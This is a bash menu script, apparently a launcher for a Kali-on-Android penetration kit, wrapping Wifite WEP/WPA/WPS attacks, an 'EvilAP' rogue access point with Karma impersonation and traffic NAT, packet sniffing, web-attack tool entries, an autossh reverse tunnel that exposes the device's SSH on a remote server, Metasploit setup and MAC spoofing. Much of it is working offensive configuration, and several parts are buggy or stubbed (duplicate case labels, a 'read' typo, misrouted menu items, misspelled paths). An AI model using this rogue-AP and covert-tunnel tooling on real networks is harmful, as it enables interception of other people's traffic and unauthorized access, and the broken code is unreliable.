#!/bin/bash
#
## date format ##
NOW=$(date +"%m-%d-%y-%H%M%S")
########################## MAIN MENU ###############################
f_interface(){
clear
echo "			KALI ANDROID MAIN MENU"
echo ""
echo ""
echo "[1]	Wireless Attacks		[5]	Information Gathering"
echo "[2]	Sniffing/Spoofing		[6]	Vulnerability Analysis"
echo "[3]	Web Applications		[7]	Exploitation Tools"
echo "[4]	Reverse Shells			[8]	Reverse Engineering" 	
echo ""
echo "[88]	Services"
echo "[99]	Settings"
echo ""
echo "[0]	Exit To Command Line"
echo ""

# wait for character input

read -p "Choice: " menuchoice

case $menuchoice in

1) clear; f_wireless_attacks ;;
2) clear; f_sniffing ;;
3) clear; f_web_applications ;;
4) clear; f_reverse ;;
5) clear; f_information_gathering ;;
6) clear; f_vulnerability ;;
7) clear; f_exploitation ;;
8) clear; f_reverse ;;
88) clear; f_services ;;
99) clear; f_settings ;;
0) clear; exit 1 ;;
*) echo "Incorrect choice..." ;
esac
}

########################## WIRELESS MENU ###############################
f_wireless_attacks(){
f_wlan1check
echo "				WIRELESS ATTACKS MAIN MENU"
echo ""
echo ""
echo "[1]	Wifite"
echo "[2]	EvilAP"
echo "[3]	Kismet"
echo ""
echo "[0]	Exit"
echo ""
read -p "Choice: " wirelesschoice

case $wirelesschoice in

1) clear; f_wifite ;;
2) clear; f_evilap ;;
3) clear; f_kismet ;;
0) clear; f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_wlan1check(){
adaptor=`ip addr | grep wlan1`
if [ -z "$adaptor" ]; then
    ifconfig wlan1 up
    sleep 2
    echo "Attempting to bring wlan1 up"
    	if [ -z "$adaptor" ]; then
    		echo "Still not detecting wlan1, please try plugging it in again."
    		sleep 5
    		clear
    		echo -e "\e[31mWLAN1: NOT FOUND\e[0m"
    		echo ""
    	fi
else
	echo -e "\e[92mWLAN1: FOUND\e[0m" 
	echo ""
fi
}

f_wifite(){
cd /captures/wifite
while :
do
clear
echo "* WIFITE QUICK SELECT *"
echo ""
echo "[1] Regular Wifite"
echo "[2] Attack all WEP"
echo "[3] Capture all WPA (no cracking)"
echo "[4] Attack WPS with power over 40+"
echo "[0] Exit to Wirelss Attack Menu"
echo -n "Enter your menu choice [1-3]: "
read yourch
case $yourch in
1) clear; wifite ;;
2) clear; wifite -all -wep ;;
3) clear; wifite -all -wpa --dict none ;;
4) clear; wifite -p 40 -wps ;;
0) clear; f_wireless_attacks ;;
*) echo "Incorrect choice..." ;
echo "Press Enter to continue. . ." ; read ;; esac
done
}

f_evilap(){

	f_evilap_check(){
	# Check for dnsmasq.conf and if not there create a default one
	if [ ! -e "/etc/dnsmasq.conf" ]; then
		echo "Default dnsmasq.conf was not found. Creating new one."
		sleep 5
		cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan1
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
	fi
	}
	f_evilap_menu(){
	clear
	echo "				EVIL ACCESS POINT"
	echo ""
	echo "	Using hostapd requires external wireless (wlan1)"
	echo ""
	echo "[1] Start EvilAP with internet from wlan0"
	echo "[2] Start EvilAP with internet from rmnet0 (3G)"
	echo "[3] Stop EvilAP and flush iptables"
	echo ""
	echo "[0]	Exit to Wireless Menu"

	read -p "Choice: " evilchoice

	case $evilchoice in

	1) clear; INT_EVIL_INTERNET=wlan0; f_evilap_start_ap ;;
	2) clear; INT_EVIL_INTERNET=rmnet0; f_evilap_start_ap ;;
	3) clear; f_evilap_stop_ap ;;
	0) clear; f_wireless_attacks ;;
	*) echo "Incorrect choice..." ;
	esac
	}

f_evilap_stop_ap(){
clear
if [ -e "/opt/evilap.pid" ]; then
	echo "Shutting Down EvilAP"
	kill -KILL $(cat /opt/evilap.pid)
	if [ $? != 0 ]
        then
            echo "Unable to shutdown EvilAP"        
        else
            echo "EvilAP has been shutdown"
        fi
else
	echo "EvilAP does not appear to be running: evilap.pid was not found"
	sleep 3
fi
echo "Shutting down dnsmasq"
service dnsmasq stop
sleep 3
echo "Flushing IP tables"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "Bringing down wlan1"
ifconfig wlan1 down
echo "Bringing up wlan1"
ifconfig wlan1 up
sleep 5
}

f_evilap_start_ap(){
	EVIL_LOGNAME="/captures/evilap/evilap-$(date +%s).log"
	clear
	echo "Restarting wlan1"
	ifconfig wlan1 down

	sleep 2
	ifconfig wlan1 up
	ifconfig wlan1 10.0.0.1/24
	read -p "Enter an SSID name for Access Point: " EVIL_SSID
	echo "Using $EVIL_SSID as SSID"
		if [ $EVIL_SSID -eq 0 ]; then
			EVIL_SSID=default
			echo "Using default as SSID"
		fi
	echo "Setting iptables"
	iptables -t nat -F
	iptables -F
	iptables -t nat -A POSTROUTING -o $INT_EVIL_INTERNET -j MASQUERADE
	iptables -A FORWARD -i wlan1 -o $INT_EVIL_INTERNET -j ACCEPT
	# remove previous hostapd
	rm /etc/hostapd/evilhostapd.conf
	# check for karma option
	clear
	echo "Karma enabled will cause your AP to pretend to be any clients previous associated AP"
	echo ""
	read -p "Enable Karma? (y/n)" karma
	if [ "$karma" == "y" ]; then
	cat <<EOF > /etc/hostapd/evilhostapd.conf
interface=wlan1
driver=nl80211
ssid=$EVIL_SSID
channel=1
# Yes, we support the Karma attack.
enable_karma=1
EOF
	else
	cat <<EOF > /etc/hostapd/evilhostapd.conf
interface=wlan1
driver=nl80211
ssid=$EVIL_SSID
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
	fi
	echo "Staring dnsmasq (DNS server)"
	service dnsmasq start
	echo "Starting hostapd (AP)"
	hostapd -d -P /opt/evilap.pid /etc/hostapd/evilhostapd.conf & > $EVIL_LOGNAME
}

# This is where EvilAP launches the menu
f_evilap_check
f_evilap_menu
}

f_kismet(){
#!/bin/bash
echo "Make sure BlueNMEA is running before starting with GPS support"
sleep 3
read -p "Would you like to run Kismet with GPS enabled? (y/n)" CONT
if [ "$CONT" == "y" ]; then
	(socat TCP:127.0.0.1:4352 PTY,link=/tmp/gps & gpsd /tmp/gps) & kismet -g;
	killall gpsd
	f_giskismet;
	wipe -f -P 5 /tmp/gps
else
  echo "Running Kismet WITHOUT GPS support..."
  sleep 2
  kismet -g;
  clear
fi
}

f_giskismet(){

# create database folder or check if one exsists
if [ ! -d "/captures/kismet_db" ]; then
	mkdir -p "/captures/kismet_db"
fi
# process all netxml files
cd /captures/kismet/
for capture in $(find . -iname '*.netxml'); do
echo "Adding $capture to datbase"
sleep 5
giskismet -x "$capture" --database "/captures/kismet_db/wireless.dbl"
done
# export kml of all wireless data and copy files to sdcard
giskismet --database "/opt/pwnpad/captures/kismet_db/wireless.dbl" -q "select * from wireless" -o "/captures/kismet/kismet-$NOW.kml"
echo "Created kismet-$NOW.kml file for Google Earth"
cd /sdcard/
zip -rj "kismet-captures-$NOW.zip" /captures/kismet/
echo "Successfully copied to /sdcard/kismet-captures-$NOW.zip"
# option to erase files
read -p "Would you like to secure erase all files in Kismet folder? (y/n)" CONT
if [ "$CONT" == "y" ]; then
	echo "Removing capture files..."
	wipe -f -i -r /captures/kismet/*
else
  echo "All files copied successfully!";
fi
}
##########################   SNIFFING MENU     ###############################

f_sniffing(){
echo "				SNIFFING/SPOOFING MAIN MENU"
echo ""
echo "[1]	tcpdump"
echo "[2]	tshark"
echo "[3]	urlsnarf"
echo "[4]	dsniff"
echo ""
echo "[0]	Exit"
echo ""
read -p "Choice: " sniffchoice

case $sniffchoice in

1) clear; f_tcpdump ;;
2) clear; f_tshark ;;
3) clear; f_urlsnarf ;;
4) clear; f_dsniff ;;
0) clear; exit 1 ;;
*) echo "Incorrect choice..." ;
esac
}

f_tcpdump(){
	f_sniff_interface
	tcpdump -n -tttt -i $sniffinterface -w /captures/tcpdump/tcpdump-$NOW.pcap;
}
f_tshark(){
	f_sniff_interface
	tshark -i $sniffinterface -w /captures/tshark/tshark-$now.cap;
}
f_urlsnarf(){
	f_sniff_interface
}
f_dsniff(){
	f_sniff_interface
}

f_sniff_interface(){
echo "Choose which interface to start sniffing on"
echo ""
echo "[1]	wlan0"
echo "[2]	wlan1"
echo "[3]	rmnet0"
echo "[4]	eth0"
echo ""
read -p "Choice:" sniffinterface

case $sniffinterface in

1) clear; sniffinterface=wlan0 ;;
1) clear; sniffinterface=wlan1 ;;
1) clear; sniffinterface=rmnet0 ;;
1) clear; sniffinterface=eth0 ;;
*) echo "Incorrect choice..." ;
esac
}

##########################   WEB APP MENU    ###############################

f_web_applications(){
echo "				WEB APPLICATION MAIN MENU"
echo ""
echo "[1]	sqlmap"
echo "[2]	sqlninja"
echo "[3]	xsser"
echo ""
echo "[0]	Exit"

read -p "Choice: " webchoice

case $webchoice in
1) clear; f_tcpdump ;;
2) clear; f_tshark ;;
3) clear; xsser ;;
*) echo "Incorrect choice..." ;
esac
}
########################## INFO GATHER MENU ##############################

f_information_gathering(){
	echo "Insert"
}
########################## VULNERABILITY MENU ###########################

f_vulnerability(){
	echo "Insert"
}
########################## EXPLOITATION MENU ############################

f_exploitation(){
	echo "Insert"
}
########################## REVERSE MENU ################################
f_reverse(){
echo "				REVERSE SHELLS"
echo ""
echo "[1] Setup AutoSSH (if you can ssh out)"
echo "[2] Setup pTunnel - (if you can ping out)"
echo "+++++++++++++++++ EXECUTE +++++++++++++++++ "
echo ""
echo "[3] Start AutoSSH reverse shell"
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " serviceschoice

case $serviceschoice in
1) clear; f_autossh ;;
2) clear; f_ptunnel ;;
3) clear; f_start_autossh ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_autossh(){
clear
if [ -e "/root/.ssh/auto_id_rsa" ]; then
        echo "SSH keys found at /root/.ssh/auto_id_rsa"
        read -p "Would you like to generate new SSH keys? (y/n):" autossh_new_keys
        if [ "$autossh_new_keys" == "y" ]; then
        	rm -rf /root/.ssh/auto_id*
        	f_generate_autossh_keys
        fi
else
	echo "KEY AUTO_ID_RSA NOT FOUND: Generate new SSH keys?"
	f_generate_autossh_keys
fi

	f_generate_autossh_keys()
	{
		echo "Generating new keys"
		chmod 700 /root/.ssh
		ssh-keygen -b 1024 -N '' -f /root/.ssh/auto_id_rsa -t rsa -q
		chmod 600 /root/.ssh/auto_id_rsa
		chmod 644 /root/.ssh/auto_id_rsa.pub
		sleep 4
	}

read -p "Copy keys to remote (middle) server? (y/n): " copykeymiddle
if [ "$copykeymiddle" == "y" ]; then
		echo "Enter remote host connection details:"
		echo ""
		read -p "Enter remote server username: " -e -i "root" amu
		read -p "Enter remote server address (ip/domain): " amh
		read -p "Enter remote server port: " -e -i "22" amp
		ssh-copy-id -i /root/.ssh/auto_id_rsa.pub "-p $amp $amu@$amh"
fi
f_reverse
}

f_start_autossh(){
#
# For help setting up autossh, I utilized the guide here:
# https://raymii.org/s/tutorials/Autossh_persistent_tunnels.html
#
clear
if [ -e "/root/autossh_config" ]; then
	read -p "Use previous autossh configuration? (y/n): " autossh_previous
		if [ "$autossh_previous" == "y" ]; then
			echo "Starting autossh..."
			/root/autossh_config
			f_reverse
		fi
	else
	read -p "Would you like to remove previous configuration? (y/n): " autossh_remove
		if [ "autossh_remove" == "y" ]; then
			rm -rf /root/autossh_config
		fi
fi
clear
read -p "Enter local autossh monitoring port: " -e -i "1010" autossh_local_port
read -p "Enter local autossh reverse tunnel port: " -e -i "6666" autossh_forward_port
read -p "Enter remote server username: " -e -i "root" amu
read -p "Enter remote server address (ip/domain): " amh
read -p "Enter remote server port: " -e -i "22" amp
echo ""
echo "Starting autossh..."
autossh -M $autossh_local_port -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/auto_id_rsa -R $autossh_forward_port:localhost:22 $amu@$amh -p $amp
echo "You can now access this Android device from the remote server using:"
echo "ssh -p $autossh_forward_port $amu@127.0.0.1"
sleep 8
clear
echo "*** The following file will not be secure and will contain server/username information ***"
echo ""
read -p "Would you like to save configuration as an executable file? (y/n): " autossh_file
	if [ "$autossh_file" == "y"]; then
		echo "autossh -M $autossh_local_port -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/auto_id_rsa -R $autossh_forward_port:localhost:22 $amu@$amh -p $amp" > /root/autossh_config
		chmod +x /root/autossh_config
		echo "File saved to /root/autossh_config"
		sleep 5
	fi
f_reverse
}

f_ptunnel(){
	echo "Set up pTunnel"
}

########################## SERVICES MENU ###############################

f_services(){
echo "				SERVICES"
echo "[1] Start SSH Server"
echo "[2] Start VNC Server"
echo "[3] Kill all VNC instances (remove pid/logs)"
echo "[4] Start Metasploit"
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " serviceschoice

case $serviceschoice in
1) clear; f_ssh ;;
2) clear; f_vncstart ;;
3) clear; f_vnckill ;;
4) clear; f_vpnmenu ;;
5) clear; /opt/metasploit/scripts/start.sh ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_ssh(){
	# need to add more to this later
	service ssh start
}

f_vncstart(){
clear
echo "VNC START MENU"
echo "[1] Start Nexus 7 (2012) - 1280x1024"
echo "[2] Start Nexus 7 (2013) - 1920x1200"
echo "[3] Start Nexus 10 - 2650x1600"
echo "[4] Custom Display Size"
echo "[5] Exit to main menu"
echo -n "Enter your menu choice [1-5]: "
read -p "Choice:" vncmenustart

case $vncmenustart in
1) vncserver -geometry 1280x1024 -depth 24 && echo "Display Number :X will be port 590X." && read -p "Press any key to continue..." && f_services ;;
2) vncserver -geometry 1920x1200 -depth 24 && echo "Display Number :X will be port 590X." && read -p "Press any key to continue..." && f_services ;;
3) vncserver -geometry 2650x1600 -depth 24 && echo "Display Number :X will be port 590X." && read -p "Press any key to continue..." && f_services ;;
4) f_customvnc ;;
5) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_customvnc(){
	read -p "Enter Custom Display Size (e.g. ####x####) " CUSTOMVNCSIZE
	vncserver -geometry $CUSTOMVNCSIZE -depth 24
	echo "Display Number :X will be port 590X." && read -p "Press any key to continue..." && f_interface
}

f_vnckill(){
	echo "Removing all PID and log files from /root/.vnc/"
	echo "Killing all VNC process ID's"
	sleep 2
	kill $(ps aux | grep 'Xtightvnc' | awk '{print $2}')
	echo "Removing PID files"
	sleep 2
	vncdisplay=$(ls ~/.vnc/*.pid | sed -e s/[^0-9]//g)
	for x in $vncdisplay; do tightvncserver -kill :$x; done;
	echo "Removing log files"
	sleep 2
	rm /root/.vnc/*.log;
	echo "Removing lock file"
	sleep 2
	rm -r /tmp/.X*
	echo "All VNC process/logs have hopefully been removed"
	sleep 3
}

f_vpnmenu(){
clear
echo "[1] Build VPN Server Keys (will remove previous old keys)"
echo "[2] Use custom domain or dynamic DNS"
echo "[3] Export Client Keys to sdcard"
echo "[4] Start VPN Server"
echo "[5] Exit to Main Menu"
echo -n "Enter your menu choice [1-6]: "
read -p "Choice: " vpnkeychoice

case $vpnkeychoice in
1) f_server_key ;;
2) f_domain_clientkey ;;
3) f_exportkeys ;;
4) f_startvpn ;;
5) f_settings ;;
*) echo "Incorrect choice..." ;
esac
}

f_server_key(){
echo "Checking Dependencies"
sleep 3
apt-get update
cd /etc/openvpn
echo "Removing previous server..."
rm -rf easy-rsa
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 ./easy-rsa
cd easy-rsa
echo 'export EASY_RSA="/etc/openvpn/easy-rsa"' >> vars
source vars
./clean-all
./pkitool --initca
ln -s openssl-1.0.0.cnf openssl.cnf
echo "Building Server Certificates"
sleep 3
echo "Generating Certificate Authority Key..."
./build-ca OpenVPN
echo "Generating Server Key..."
./build-key-server server
echo "Generating client1 Key..."
./build-key client1
./build-dh
cd /etc/openvpn
echo "Creating configuration file in /etc/opevpn/openvpn.conf"
cat << EOF > /etc/opevpn/openvpn.conf
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nogroup
server 10.8.0.0 255.255.255.0
persist-key
persist-tun
status /var/log/openvpn-status.log
verb 3
client-to-client
push "redirect-gateway def1"
#set the dns servers
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
log-append /var/log/openvpn
comp-lzo
EOF
# RETURN TO VPN MENU
f_vpnmenu
}

f_domain_clientkey(){
clear
#PUBLIC_IP=$(curl www.icanhazip.com)
#echo "Your current ip is: $PUBLIC_IP"
#echo ""
read -p "Enter custom domain/IP/dynamic IP:" DOMAIN_IP
cat << EOF > /etc/openvpn/easy-rsa/keys/kaliserver.ovpn
dev tun
client
proto udp
remote $DOMAIN_IP 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3	
EOF
echo "Finished. Returning to menu."
sleep 5
# RETURN TO VPN MENU
f_vpnmenu
}

f_exportkeys(){
echo "Zipping client keys to /sdcard/openvpn-kaliserver-clientcert.zip"
sleep 5
cd /etc/openvpn/easy-rsa/keys/
zip -r6 /sdcard/openvpn-kaliserver-clientcert.zip openvpn-keys.tgz ca.crt ca.key client1.crt client1.csr client1.key kaliserver.ovpn
echo "If you received an error things may have gone wrong when generating a certificate..."
sleep 6
# RETURN TO VPN MENU
f_vpnmenu
}

f_startvpn(){
echo "Starting OpenVPN"
sleep 3
iptables -t nat -A POSTROUTING -s 10.0.0.0/8 ! -d 10.0.0.0/8 -o wlan0 -j MASQUERADE
service openvpn start
echo "OpenVPN started"
sleep 5
f_vpnmenu
}
########################## SETTINGS MENU ###############################
f_settings(){
echo "				SETTINGS"
echo ""
echo "[1] Change Start Up Settings"
echo "[2] Configure Timezone"
echo "[3] Change VNC Password"
echo "[4] Create Metasploit User and Database"
echo "[5] Macchanger (wlan1)"
echo "[0] Exit to main menu"

ead -p "Choice:" settingschoice

case $settingschoice in
1) clear; f_startup ;;
2) clear; dpkg-reconfigure tzdata ;;
3) clear; echo "Change your VNC password:"; vncpasswd ;;
4) clear; f_msuser ;;
5) clear; f_macchanger ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}
f_startup(){
configfile=/root/.firstrun.option
if [ -e "$configfile" ]; then
	source $configfile
else
	echo "Start up settings not found, exiting to settings menu"
	sleep 5
	f_settings
fi
clear
if [ "$sshonboot" == "1" ]; then
	echo "[X] SSH Set to start up boot"
	read -p "Turn SSH OFF on boot? (y/n): " sshoffboot
	if [ "$sshoffboot" == "y" ]; then sed -i 's/sshonboot=1/sshonboot=0/g' $configfile fi
	echo "SSH will not load on boot"
	sleep 5
else
	echo "[ ] SSH Not set to start on boot"
	read -p "START SSH on boot? (y/n): " sshonboot
	if [ "$sshonboot" == "y" ]; then sed -i 's/sshonboot=0/sshonboot=1/g' $configfile fi
	echo "SSH will load on boot"
	sleep 5
fi

if [ "$vnconboot" == "1" ]; then
	echo "[X] VNC Set to start up on boot"
	read -p "Turn VNC OFF on boot? (y/n): " vncoffboot
	if [ "$vncoffboot" == "y" ]; then sed -i 's/vnconboot=1/vnconboot=0/g' $configfile fi
	echo "VNC will not load on boot"
	sleep 5
else
	echo "[ ] VNC Not set to start on boot"
	read -p "START VNC on boot? (y/n): " vnconboot
	if [ "$vnconboot" == "y" ]; then sed -i 's/vnconboot=0/vnconboot=1/g' $configfile fi
	echo "VNC will load on boot"
	sleep 5
fi
}

f_msuser() {
	service postgresql
	echo "Switching to user postgres"
	su postgres	
	read -p "Enter Metasploit database username:" msuser
	createuser -D -P -R -S $msuser
	read -p "Enter Metasploit database name:" dbname
	createdb --owner=$msuser $dbname
	su root
	echo "You can now add database connection to startup at ~/.msf4/msfconsole.rc"
	echo "Add:"
	echo "db_connect $msuser:YOURPASSWORD@127.0.0.1:5432/$dbname"
	sleep 4
	f_interface
}

f_macchanger(){
	read -p "Use random MAC address on wlan1? (y/n)" randommac
	if [ "$randommac" == "y" ]; then
		macchanger --random wlan1
	else
		read -p "Would you like to set a specific MAC address?" specificmac
			if [ "$specificmac" == "y" ]; then
				read -p "Enter your specific MAC address: " spec_evil_mac
				macchanger --mac=$spec_evil_mac wlan1
			fi
	fi
}
# **** START **** #
f_interface